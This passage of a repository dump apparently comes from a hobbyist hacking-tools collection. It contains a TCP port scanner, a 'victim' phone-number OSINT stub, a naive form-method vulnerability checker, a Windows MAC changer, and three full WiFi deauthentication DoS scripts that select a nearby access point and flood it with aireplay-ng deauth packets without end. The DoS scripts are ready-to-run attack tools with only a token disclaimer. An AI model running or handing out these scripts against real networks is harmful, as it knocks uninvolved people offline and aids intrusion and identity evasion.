| net_io = psutil.net_io_counters() 120 | print(f"Total Bytes Sent: {get_size(net_io.bytes_sent)}") 121 | print(f"Total Bytes Received: {get_size(net_io.bytes_recv)}") 122 | 123 | 124 | # GPU information 125 | import GPUtil 126 | from tabulate import tabulate 127 | print("="*40, "GPU Details", "="*40) 128 | gpus = GPUtil.getGPUs() 129 | list_gpus = [] 130 | for gpu in gpus: 131 | # get the GPU id 132 | gpu_id = gpu.id 133 | # name of GPU 134 | gpu_name = gpu.name 135 | # get % percentage of GPU usage of that GPU 136 | gpu_load = f"{gpu.load*100}%" 137 | # get free memory in MB format 138 | gpu_free_memory = f"{gpu.memoryFree}MB" 139 | # get used memory 140 | gpu_used_memory = f"{gpu.memoryUsed}MB" 141 | # get total memory 142 | gpu_total_memory = f"{gpu.memoryTotal}MB" 143 | # get GPU temperature in Celsius 144 | gpu_temperature = f"{gpu.temperature} °C" 145 | gpu_uuid = gpu.uuid 146 | list_gpus.append(( 147 | gpu_id, gpu_name, gpu_load, gpu_free_memory, gpu_used_memory, 148 | gpu_total_memory, gpu_temperature, gpu_uuid 149 | )) 150 | 151 | print(tabulate(list_gpus, headers=("id", "name", "load", "free memory", "used memory", "total memory", 152 | "temperature", "uuid"))) 153 | input("Enter To Exit Window") -------------------------------------------------------------------------------- /tcp-scanner.py: -------------------------------------------------------------------------------- 1 | from socket import * #importing everything from bluit in python module socket 2 | import optparse #importing optparse library for accepting arguments 3 | import threading # threading library for simultaneous execution of program or functions 4 | import time 5 | def portScan(host, port): 6 | try: 7 | s = socket(AF_INET, SOCK_STREAM) #creating an object of class socket AF_INET for ipv4 and AF_INET6 for ipv6 8 | #SOCK_STREAM is for tcp(protocol) and SOCK_DGRAM id for udp(protocol) 9 | s.connect((host, int(port))) # connecting to the socket with target host and port 10 | print(host + " tcp/" + str(port) + " open") 11 | s.close() 12 | 13 | except: 14 | print(host + " tcp/" + str(port) + " closed") # print this if unable to connect (meaning port closed) 15 | 16 | 17 | def main(): 18 | 19 | parser = optparse.OptionParser("uasge%prog " + "-H -p ") 20 | parser.add_option("-H" , '--host' , dest = 'targethost' , type = 'string' , help = 'specify target hsot') 21 | parser.add_option("-p", "--ports", dest = 'targetports', type = 'string', help = 'specify target ports separated by "," ') 22 | 23 | option , args = parser.parse_args() # this functions returns the arguments received inside object options 24 | 25 | thost = option.targethost # accessing arguments 26 | tports = str(option.targetports).split(",") 27 | 28 | if thost == None or tports[0] == None: 29 | print(parser.usage) #prints the usage defined inside the OptionParser class Above as string 30 | exit(0) 31 | 32 | 33 | setdefaulttimeout(1) # close connection if no response is received 34 | host_ip = gethostbyname(thost) # get the target ip using target domain 35 | 36 | for port in tports: 37 | t = threading.Thread(target=portScan, args=(thost,port)) # creating a portScann Function thread for each port in port list 38 | t.start() #Starting the thread 39 | 40 | main() 41 | time.sleep(4) 42 | -------------------------------------------------------------------------------- /test.py: -------------------------------------------------------------------------------- 1 | logo = ''' 2 | Phone Number Osint 3 | created by R3DHULK 4 | ''' 5 | print(logo) 6 | number = input ("Enter Victim's Phone Number (with +91) : ") 7 | -------------------------------------------------------------------------------- /website-vulnerability-finder.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | print('''\033[93m 4 | ********************************************* 5 | * * 6 | * Simple Website Vulnerability Finder * 7 | * Github Page : https://github.com/R3DHULK * 8 | * * 9 | ********************************************* 10 | ''') 11 | def scan_website(url): 12 | # Send an HTTP GET request to the website 13 | response = requests.get(url) 14 | 15 | # Parse the HTML of the website 16 | soup = BeautifulSoup(response.text, 'html.parser') 17 | 18 | # Initialize an empty list to store vulnerabilities 19 | vulnerabilities = [] 20 | 21 | # Search for HTML form elements 22 | forms = soup.find_all('form') 23 | for form in forms: 24 | # Check if the form has a vulnerable method (e.g. GET) 25 | method = form.get('method') 26 | if method.lower() == 'get': 27 | vulnerabilities.append('Vulnerable form: {}'.format(form)) 28 | 29 | # Return the list of vulnerabilities 30 | return vulnerabilities 31 | 32 | # Test the scanner 33 | url = input("\033[92m [*] Enter URL: ") 34 | print("") 35 | vulnerabilities = scan_website(url) 36 | print(vulnerabilities) 37 | -------------------------------------------------------------------------------- /wifi_dos_final.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test. 3 | # importing sys 4 | import sys 5 | # We will be using the subprocess module to run commands on Kali Linux. 6 | import subprocess 7 | # We will require regular expressions. 8 | import re 9 | # We want to open the CSV files generated by airmon-ng, and we'll use the built-in csv module. 10 | import csv 11 | # We want to import os because we want to check for sudo 12 | import os 13 | # We want to use time.sleep() 14 | import time 15 | # We want to move .csv files in the folder if we found any. We'll use shutil for that. 16 | import shutil 17 | # Create a timestamp for .csv filename 18 | from datetime import datetime 19 | 20 | # We declare an empty list where all active wireless networks will be saved to. 21 | active_wireless_networks = [] 22 | 23 | # We use this function to test if the ESSID is already in the list file. 24 | # If so we return False so we don't add it again. 25 | # If it is not in the lst we return True which will instruct the elif 26 | # statement to add it to the lst. 27 | def check_for_essid(essid, lst): 28 | check_status = True 29 | 30 | # If no ESSIDs in list add the row 31 | if len(lst) == 0: 32 | return check_status 33 | 34 | # This will only run if there are wireless access points in the list. 35 | for item in lst: 36 | # If True don't add to list. False will add it to list 37 | if essid in item["ESSID"]: 38 | check_status = False 39 | 40 | return check_status 41 | 42 | def slowprint(s): 43 | for c in s + '\n' : 44 | sys.stdout.write(c) 45 | sys.stdout.flush() 46 | time.sleep(10. / 100) 47 | os.system("clear") 48 | # Basic user interface header 49 | print("""\033[92m 50 | [+]---------------------------------------------------------------------[+] 51 | | __ _____ ___ ___ ___ ___ ___ ___ _____ _ | 52 | | \ \ / /_ _| __|_ _| | \| \ / _ \/ __| |_ _|__ ___| | | 53 | | \ \/\/ / | || _| | | | |) | |) | (_) \__ \ | |/ _ \/ _ \ |__ | 54 | | \_/\_/ |___|_| |___| |___/|___/ \___/|___/ |_|\___/\___/____| | 55 | | | 56 | | github page : https://github.com/R3DHULK | 57 | [+]---------------------------------------------------------------------[+] 58 | """) 59 | 60 | 61 | # If the user doesn't run the program with super user privileges, don't allow them to continue. 62 | if not 'SUDO_UID' in os.environ.keys(): 63 | slowprint("\033[91m [!] Try running this program with sudo.") 64 | exit() 65 | 66 | # Move all .csv files in the directory to a backup folder. 67 | for file_name in os.listdir(): 68 | # We should only have one csv file as we delete them from the folder every time we run the program. 69 | if ".csv" in file_name: 70 | print("\033[93m [!] There shouldn't be any .csv files in your directory. We found .csv files in your directory.") 71 | # We get the current working directory. 72 | directory = os.getcwd() 73 | try: 74 | # We make a new directory called /backup 75 | os.mkdir(directory + "/backup/") 76 | except: 77 | slowprint("\033[4m [+] Backup folder exists.") 78 | # Create a timestamp 79 | timestamp = datetime.now() 80 | # We copy any .csv files in the folder to the backup folder. 81 | shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name) 82 | 83 | # Regex to find wireless interfaces, we're making the assumption they will all be wlan0 or higher. 84 | wlan_pattern = re.compile("^wlan[0-9]+") 85 | 86 | # Python allows us to run system commands by using a function provided by the subprocess module. 87 | # subprocess.run(, ) 88 | # We want to capture the output. The output will be in standard UTF-8 and will decode it. 89 | # The script is the parent process and creates a child process which runs the system command, and will only continue once the child process has completed. 90 | # We run the iwconfig command to look for wireless interfaces. 91 | check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode()) 92 | 93 | # No WiFi Adapter connected. 94 | if len(check_wifi_result) == 0: 95 | slowprint("\033[91m [?] Please connect a WiFi controller and try again.") 96 | exit() 97 | 98 | # Menu to select WiFi interface from 99 | slowprint("\033[92m [+] The following WiFi interfaces are available:") 100 | for index, item in enumerate(check_wifi_result): 101 | print(f" {index} - {item}") 102 | 103 | # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. 104 | while True: 105 | wifi_interface_choice = input("\033[96m Please select the interface you want to use for the attack: ") 106 | try: 107 | if check_wifi_result[int(wifi_interface_choice)]: 108 | break 109 | except: 110 | print("\033[91m [-] Please enter a number that corresponds with the choices.") 111 | 112 | # For easy reference we call the picked interface hacknic 113 | hacknic = check_wifi_result[int(wifi_interface_choice)] 114 | 115 | # Kill conflicting WiFi processses 116 | slowprint("\033[91m [+] WiFi adapter connected!\n [*] Now let's kill conflicting processes:") 117 | 118 | # subprocess.run() 119 | # The script is the parent process and creates a child process which runs the system command, and will only continue once the child process has completed. 120 | # We run the iwconfig command to look for wireless interfaces. 121 | # Killing all conflicting processes using airmon-ng 122 | kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"]) 123 | 124 | # Put wireless in Monitored mode 125 | slowprint("\033[91m [*] Putting Wifi adapter into monitored mode:") 126 | put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic]) 127 | 128 | # subprocess.Popen() 129 | # The Popen method opens a pipe from a command. The output is an open file that can be accessed by other programs. 130 | # We run the iwconfig command to look for wireless interfaces. 131 | # Discover access points 132 | discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 133 | 134 | # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c. 135 | try: 136 | while True: 137 | # We want to clear the screen before we print the network interfaces. 138 | subprocess.call("clear", shell=True) 139 | for file_name in os.listdir(): 140 | # We should only have one csv file as we backup all previous csv files from the folder every time we run the program. 141 | # The following list contains the field names for the csv entries. 142 | fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key'] 143 | if ".csv" in file_name: 144 | with open(file_name) as csv_h: 145 | # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above. 146 | # This creates a list of dictionaries with the keys as specified in the fieldnames. 147 | csv_h.seek(0) 148 | csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames) 149 | for row in csv_reader: 150 | if row["BSSID"] == "BSSID": 151 | pass 152 | elif row["BSSID"] == "Station MAC": 153 | break 154 | elif check_for_essid(row["ESSID"], active_wireless_networks): 155 | active_wireless_networks.append(row) 156 | 157 | print("\033[91m [*] Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n") 158 | print("\033[94m No |\tBSSID |\tChannel|\tESSID |") 159 | print("___|\t___________________|\t_______|\t______________________________|") 160 | for index, item in enumerate(active_wireless_networks): 161 | # We're using the print statement with an f-string. 162 | # F-strings are a more intuitive way to include variables when printing strings, 163 | # rather than ugly concatenations. 164 | print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}") 165 | # We make the script sleep for 1 second before loading the updated list. 166 | time.sleep(1) 167 | 168 | except KeyboardInterrupt: 169 | print("\033[92m\n [+] Ready to make choice.") 170 | 171 | # Ensure that the input choice is valid. 172 | while True: 173 | choice = input("\033[92m [+] Please select a choice from above: ") 174 | try: 175 | if active_wireless_networks[int(choice)]: 176 | break 177 | except: 178 | print("\033[91m [-] Please try again.") 179 | 180 | # To make it easier to work with we assign the results to variables. 181 | hackbssid = active_wireless_networks[int(choice)]["BSSID"] 182 | hackchannel = active_wireless_networks[int(choice)]["channel"].strip() 183 | 184 | # Change to the channel we want to perform the DOS attack on. 185 | # Monitoring takes place on a different channel and we need to set it to that channel. 186 | subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel]) 187 | 188 | # Deauthenticate clients. We run it with Popen and we send the output to subprocess.DEVNULL and the errors to subprocess.DEVNULL. We will thus run deauthenticate in the background. 189 | subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 190 | 191 | slowprint("\033[94m <============ Press Ctrl + C at any time to abort ==============> ") 192 | input(slowprint("\033[91m Attack Potential Loaded. Press Enter To Continue ")) 193 | # We run an infinite loop which you can quit by presses ctrl-c. The deauthentication will stop when we stop the script. 194 | try: 195 | while True: 196 | print("\033[91m ********* Deauthenticating clients **********") 197 | except KeyboardInterrupt: 198 | slowprint("\033[93m [-] Attack Stopped ") 199 | # We run a subprocess.run command where we stop monitoring mode on the network adapter. 200 | subprocess.run(["airmon-ng", "stop", hacknic + "mon"]) 201 | slowprint("\033[94m 😊😊😊 Thank you! Exiting now 😊😊😊") 202 | time.sleep(2) 203 | 204 | 205 | -------------------------------------------------------------------------------- /wifi_dos_v1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test. 3 | 4 | # We will be using the subprocess module to run commands on Kali Linux. 5 | import subprocess 6 | # We require regular expressions. 7 | import re 8 | # We want to open the CSV files generated by airmon-ng, 9 | # and we'll use the built-in csv module. 10 | import csv 11 | # We want to import os because we want to check for sudo 12 | import os 13 | # We want to use time.sleep() 14 | import time 15 | # We want to move .csv files in the folder if we found any. 16 | # We'll use shutil for that. 17 | import shutil 18 | # Create a timestamp for .csv filename 19 | from datetime import datetime 20 | 21 | # Create an empty list 22 | active_wireless_networks = [] 23 | 24 | # We use this function to test if the ESSID is already in the list file. 25 | # If so we return False so we don't add it again. 26 | # If it is not in the lst we return True which will instruct the elif 27 | # statement to add it to the lst. 28 | def check_for_essid(essid, lst): 29 | check_status = True 30 | 31 | # If no ESSIDs in list add the row 32 | if len(lst) == 0: 33 | return check_status 34 | 35 | # This will only run if there are wireless access points in the list. 36 | for item in lst: 37 | # If True don't add to list. False will add it to list 38 | if essid in item["ESSID"]: 39 | check_status = False 40 | 41 | return check_status 42 | os.system("clear") 43 | # Basic user interface header 44 | print("""\033[92m 45 | [+]---------------------------------------------------------------------[+] 46 | | __ _____ ___ ___ ___ ___ ___ ___ _____ _ | 47 | | \ \ / /_ _| __|_ _| | \| \ / _ \/ __| |_ _|__ ___| | | 48 | | \ \/\/ / | || _| | | | |) | |) | (_) \__ \ | |/ _ \/ _ \ |__ | 49 | | \_/\_/ |___|_| |___| |___/|___/ \___/|___/ |_|\___/\___/____| | 50 | | | 51 | | github page : https://github.com/R3DHULK | 52 | [+]---------------------------------------------------------------------[+] 53 | """) 54 | # If the user doesn't run the program with super user privileges, don't allow them to continue. 55 | if not 'SUDO_UID' in os.environ.keys(): 56 | print("\033[91m [-] Try running this program with sudo.") 57 | exit() 58 | 59 | # Remove .csv files before running the script. 60 | for file_name in os.listdir(): 61 | # We should only have one csv file as we delete them from the folder 62 | # every time we run the program. 63 | if ".csv" in file_name: 64 | print("\033[93m [-] There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.") 65 | # We get the current working directory. 66 | directory = os.getcwd() 67 | try: 68 | # We make a new directory called /backup 69 | os.mkdir(directory + "/backup/") 70 | except: 71 | print("\033[94m [+] Backup folder exists.") 72 | # Create a timestamp 73 | timestamp = datetime.now() 74 | # We move any .csv files in the folder to the backup folder. 75 | shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name) 76 | 77 | # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher. 78 | wlan_pattern = re.compile("^wlan[0-9]+") 79 | 80 | # Python allows is to run system commands by using a function provided by the subprocess module. 81 | # subprocess.run() 82 | # The script is the parent process and creates a child process which runs the system command, 83 | # and will only continue once the child process has completed. 84 | # We run the iwconfig command to look for wireless interfaces. 85 | check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode()) 86 | 87 | # No WiFi Adapter connected. 88 | if len(check_wifi_result) == 0: 89 | print("\033[91m [-] Please connect a WiFi adapter and try again.") 90 | exit() 91 | 92 | # Menu to select WiFi interface from 93 | print("\033[92m [*] The following WiFi interfaces are available:") 94 | for index, item in enumerate(check_wifi_result): 95 | print(f"\033[92m {index} - {item}") 96 | 97 | # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. 98 | while True: 99 | wifi_interface_choice = input("\033[95m [*] Please select the interface you want to use for the attack: ") 100 | try: 101 | if check_wifi_result[int(wifi_interface_choice)]: 102 | break 103 | except: 104 | print("\033[97m [*] Please enter a number that corresponds with the choices available.") 105 | 106 | # For easy reference we call the selected interface hacknic 107 | hacknic = check_wifi_result[int(wifi_interface_choice)] 108 | 109 | # Tell the user we're going to kill the conflicting processes. 110 | print("\033[92m [+] WiFi adapter connected!\nNow let's kill conflicting processes:") 111 | 112 | # subprocess.run() 113 | # The script is the parent process and creates a child process which runs the system command, 114 | # and will only continue once the child process has completed. 115 | # We run the iwconfig command to look for wireless interfaces. 116 | # Killing all conflicting processes using airmon-ng 117 | kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"]) 118 | 119 | # Put wireless in Monitor mode 120 | print("\033[93m [*] Putting Wifi adapter into monitored mode:") 121 | put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic]) 122 | 123 | # subprocess.Popen() 124 | # The Popen method opens a pipe from a command. 125 | # The output is an open file that can be accessed by other programs. 126 | # We run the iwconfig command to look for wireless interfaces. 127 | # Discover access points 128 | discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 129 | 130 | # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c. 131 | try: 132 | while True: 133 | # We want to clear the screen before we print the network interfaces. 134 | subprocess.call("clear", shell=True) 135 | for file_name in os.listdir(): 136 | # We should only have one csv file as we backup all previous csv files from the folder every time we run the program. 137 | # The following list contains the field names for the csv entries. 138 | fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key'] 139 | if ".csv" in file_name: 140 | with open(file_name) as csv_h: 141 | # This will run multiple times and we need to reset the cursor to the beginning of the file. 142 | csv_h.seek(0) 143 | # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above. 144 | # This creates a list of dictionaries with the keys as specified in the fieldnames. 145 | csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames) 146 | for row in csv_reader: 147 | # We want to exclude the row with BSSID. 148 | if row["BSSID"] == "BSSID": 149 | pass 150 | # We are not interested in the client data. 151 | elif row["BSSID"] == "Station MAC": 152 | break 153 | # Every field where an ESSID is specified will be added to the list. 154 | elif check_for_essid(row["ESSID"], active_wireless_networks): 155 | active_wireless_networks.append(row) 156 | 157 | print("\033[91m [*] Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n") 158 | print("\033[93m No |\tBSSID |\tChannel|\tESSID |") 159 | for index, item in enumerate(active_wireless_networks): 160 | # We're using the print statement with an f-string. 161 | # F-strings are a more intuitive way to include variables when printing strings, 162 | # rather than ugly concatenations. 163 | print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}") 164 | # We make the script sleep for 1 second before loading the updated list. 165 | time.sleep(1) 166 | 167 | except KeyboardInterrupt: 168 | print("\033[92m\n [+] Ready to make choice.") 169 | 170 | # Ensure that the input choice is valid. 171 | while True: 172 | # If you don't make a choice from the options available in the list, 173 | # you will be asked to please try again. 174 | choice = input("\033[92m [+] Please select a choice from above: ") 175 | try: 176 | if active_wireless_networks[int(choice)]: 177 | break 178 | except: 179 | print("\033[91m [-] Please try again.") 180 | 181 | # To make it easier to work with and read the code, we assign the results to variables. 182 | hackbssid = active_wireless_networks[int(choice)]["BSSID"] 183 | hackchannel = active_wireless_networks[int(choice)]["channel"].strip() 184 | 185 | # Change to the channel we want to perform the DOS attack on. 186 | # Monitoring takes place on a different channel and we need to set it to that channel. 187 | subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel]) 188 | 189 | # Deauthenticate clients using a subprocess. 190 | # The script is the parent process and creates a child process which runs the system command, 191 | # and will only continue once the child process has completed. 192 | subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"]) 193 | 194 | # User will need to use control-c to break the script. 195 | -------------------------------------------------------------------------------- /wifi_dos_v2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test. 3 | 4 | # We will be using the subprocess module to run commands on Kali Linux. 5 | import subprocess 6 | # We require regular expressions. 7 | import re 8 | # We want to open the CSV files generated by airmon-ng, 9 | # and we'll use the built-in csv module. 10 | import csv 11 | # We want to import os because we want to check for sudo 12 | import os 13 | # We want to use time.sleep() 14 | import time 15 | # We want to move .csv files in the folder if we found any. 16 | # We'll use shutil for that. 17 | import shutil 18 | # Create a timestamp for .csv filename 19 | from datetime import datetime 20 | 21 | # Create an empty list 22 | active_wireless_networks = [] 23 | 24 | # We use this function to test if the ESSID is already in the list file. 25 | # If so we return False so we don't add it again. 26 | # If it is not in the lst we return True which will instruct the elif 27 | # statement to add it to the lst. 28 | def check_for_essid(essid, lst): 29 | check_status = True 30 | 31 | # If no ESSIDs in list add the row 32 | if len(lst) == 0: 33 | return check_status 34 | 35 | # This will only run if there are wireless access points in the list. 36 | for item in lst: 37 | # If True don't add to list. False will add it to list 38 | if essid in item["ESSID"]: 39 | check_status = False 40 | 41 | return check_status 42 | os.system("clear") 43 | # Basic user interface header 44 | print(""" \033[92m 45 | [+]---------------------------------------------------------------------[+] 46 | | __ _____ ___ ___ ___ ___ ___ ___ _____ _ | 47 | | \ \ / /_ _| __|_ _| | \| \ / _ \/ __| |_ _|__ ___| | | 48 | | \ \/\/ / | || _| | | | |) | |) | (_) \__ \ | |/ _ \/ _ \ |__ | 49 | | \_/\_/ |___|_| |___| |___/|___/ \___/|___/ |_|\___/\___/____| | 50 | | | 51 | | github page : https://github.com/R3DHULK | 52 | [+]---------------------------------------------------------------------[+] 53 | """) 54 | 55 | try: 56 | # If the user doesn't run the program with super user privileges, don't allow them to continue. 57 | if not 'SUDO_UID' in os.environ.keys(): 58 | print("\033[91m [-] Try running this program with sudo.") 59 | exit() 60 | 61 | # Remove .csv files before running the script. 62 | for file_name in os.listdir(): 63 | # We should only have one csv file as we delete them from the folder 64 | # every time we run the program. 65 | if ".csv" in file_name: 66 | print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.") 67 | # We get the current working directory. 68 | directory = os.getcwd() 69 | try: 70 | # We make a new directory called /backup 71 | os.mkdir(directory + "/backup/") 72 | except: 73 | print("Backup folder exists.") 74 | # Create a timestamp 75 | timestamp = datetime.now() 76 | # We move any .csv files in the folder to the backup folder. 77 | shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name) 78 | 79 | # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher. 80 | wlan_pattern = re.compile("^wlan[0-9]+") 81 | 82 | # Python allows is to run system commands by using a function provided by the subprocess module. 83 | # subprocess.run() 84 | # The script is the parent process and creates a child process which runs the system command, 85 | # and will only continue once the child process has completed. 86 | # We run the iwconfig command to look for wireless interfaces. 87 | check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode()) 88 | 89 | # No WiFi Adapter connected. 90 | if len(check_wifi_result) == 0: 91 | print("\033[91m [-] Please connect a WiFi adapter and try again.") 92 | exit() 93 | 94 | # Menu to select WiFi interface from 95 | print("\033[93m [*] The following WiFi interfaces are available:") 96 | for index, item in enumerate(check_wifi_result): 97 | print(f" {index} - {item}") 98 | 99 | # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. 100 | while True: 101 | wifi_interface_choice = input("\033[92m [+] Please select the interface you want to use for the attack: ") 102 | try: 103 | if check_wifi_result[int(wifi_interface_choice)]: 104 | break 105 | except: 106 | print("\033[91m [-] Please enter a number that corresponds with the choices available.") 107 | 108 | # For easy reference we call the selected interface hacknic 109 | hacknic = check_wifi_result[int(wifi_interface_choice)] 110 | 111 | # Tell the user we're going to kill the conflicting processes. 112 | print("\033[95m [+] WiFi adapter connected!\n [*] Now let's kill conflicting processes:") 113 | 114 | # Put wireless in Monitor mode 115 | print("\033[93m [*] Putting Wifi adapter into monitored mode:") 116 | # This is one way to put it into monitoring mode. You can also use iwconfig, or airmon-ng. 117 | subprocess.run(["ip", "link", "set", hacknic, "down"]) 118 | # Killing additional processes makes sure that nothing interferes with putting controller into monitor mode. 119 | subprocess.run(["airmon-ng", "check", "kill"]) 120 | # Put the WiFi nic in monitor mode. 121 | subprocess.run(["iw", hacknic, "set", "monitor", "none"]) 122 | # Bring the WiFi controller back online. 123 | subprocess.run(["ip", "link", "set", hacknic, "up"]) 124 | 125 | # subprocess.Popen() 126 | # The Popen method opens a pipe from a command. 127 | # The output is an open file that can be accessed by other programs. 128 | # We run the iwconfig command to look for wireless interfaces. 129 | # Discover access points 130 | discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 131 | 132 | # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c. 133 | try: 134 | while True: 135 | # We want to clear the screen before we print the network interfaces. 136 | subprocess.call("clear", shell=True) 137 | for file_name in os.listdir(): 138 | # We should only have one csv file as we backup all previous csv files from the folder every time we run the program. 139 | # The following list contains the field names for the csv entries. 140 | fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key'] 141 | if ".csv" in file_name: 142 | with open(file_name) as csv_h: 143 | # This will run multiple times and we need to reset the cursor to the beginning of the file. 144 | csv_h.seek(0) 145 | # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above. 146 | # This creates a list of dictionaries with the keys as specified in the fieldnames. 147 | csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames) 148 | for row in csv_reader: 149 | # We want to exclude the row with BSSID. 150 | if row["BSSID"] == "BSSID": 151 | pass 152 | # We are not interested in the client data. 153 | elif row["BSSID"] == "Station MAC": 154 | break 155 | # Every field where an ESSID is specified will be added to the list. 156 | elif check_for_essid(row["ESSID"], active_wireless_networks): 157 | active_wireless_networks.append(row) 158 | 159 | print("\033[91m [*] Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n") 160 | print("\033[92m No |\tBSSID |\tChannel|\tESSID |") 161 | print("\033[92m ___|\t___________________|\t_______|\t______________________________|") 162 | for index, item in enumerate(active_wireless_networks): 163 | # We're using the print statement with an f-string. 164 | # F-strings are a more intuitive way to include variables when printing strings, 165 | # rather than ugly concatenations. 166 | print(f" {index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}") 167 | # We make the script sleep for 1 second before loading the updated list. 168 | time.sleep(1) 169 | 170 | except KeyboardInterrupt: 171 | print("\n\033[93m [+] Ready to make choice.") 172 | 173 | # Ensure that the input choice is valid. 174 | while True: 175 | # If you don't make a choice from the options available in the list, 176 | # you will be asked to please try again. 177 | choice = input("\033[92m [+] Please select a choice from above: ") 178 | try: 179 | if active_wireless_networks[int(choice)]: 180 | break 181 | except: 182 | print("\033[91m [-] Please try again.") 183 | 184 | # To make it easier to work with and read the code, we assign the results to variables. 185 | hackbssid = active_wireless_networks[int(choice)]["BSSID"] 186 | hackchannel = active_wireless_networks[int(choice)]["channel"].strip() 187 | 188 | # Change to the channel we want to perform the DOS attack on. 189 | # Monitoring takes place on a different channel and we need to set it to that channel. 190 | subprocess.run(["airmon-ng", "start", hacknic, hackchannel]) 191 | 192 | # Deauthenticate clients using a subprocess. 193 | # The script is the parent process and creates a child process which runs the system command, 194 | # and will only continue once the child process has completed. 195 | try: 196 | subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, hacknic]) 197 | except KeyboardInterrupt: 198 | print("\033[94m ✔️✔️✔️✔️ Done!") 199 | # User will need to use control-c to break the script. 200 | except KeyboardInterrupt: 201 | ("\033[91m [-] Exiting......") 202 | -------------------------------------------------------------------------------- /windows-10-mac-changer.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import winreg 3 | import re 4 | import codecs 5 | 6 | print("##############################################################") 7 | print("1) Make sure you run this script with administrator privileges") 8 | print("2) Make sure that the WiFi adapter is connected to a network") 9 | print("##############################################################\n") 10 | 11 | # MAC Addresses to attempt using. You will select one when the script is used. 12 | # You can change the names in this list or add names to this list. 13 | # Make sure you use 12 valid hexadecimal values. 14 | # If the MAC address change fails try setting the second character to 2 or 6 or A or E, 15 | # for example: 0A1122334455 or 0A5544332211 16 | # If unsure, leave the MAC addresses listed here as is. 17 | mac_to_change_to = ["0A1122334455", "0E1122334455", "021122334455", "061122334455"] 18 | 19 | # We create an empty list where we'll store all the MAC addresses. 20 | mac_addresses = list() 21 | 22 | # We start off by creating a regular expression (regex) for MAC addresses. 23 | macAddRegex = re.compile(r"([A-Za-z0-9]{2}[:-]){5}([A-Za-z0-9]{2})") 24 | 25 | # We create a regex for the transport names. It will work in this case. 26 | # But when you use the .+ or .*, you should consider making it not as greedy. 27 | transportName = re.compile("({.+})") 28 | 29 | # We create regex to pick out the adapter index 30 | adapterIndex = re.compile("([0-9]+)") 31 | 32 | # Python allows us to run system commands by using a function provided by the subprocess module: 33 | # (subprocess.run(, 34 | # )) 35 | # The script is a parent process and creates a child process which runs the system command, 36 | # and will only continue once the child process has completed. 37 | # To save the content that gets sent to the standard output stream (the terminal), 38 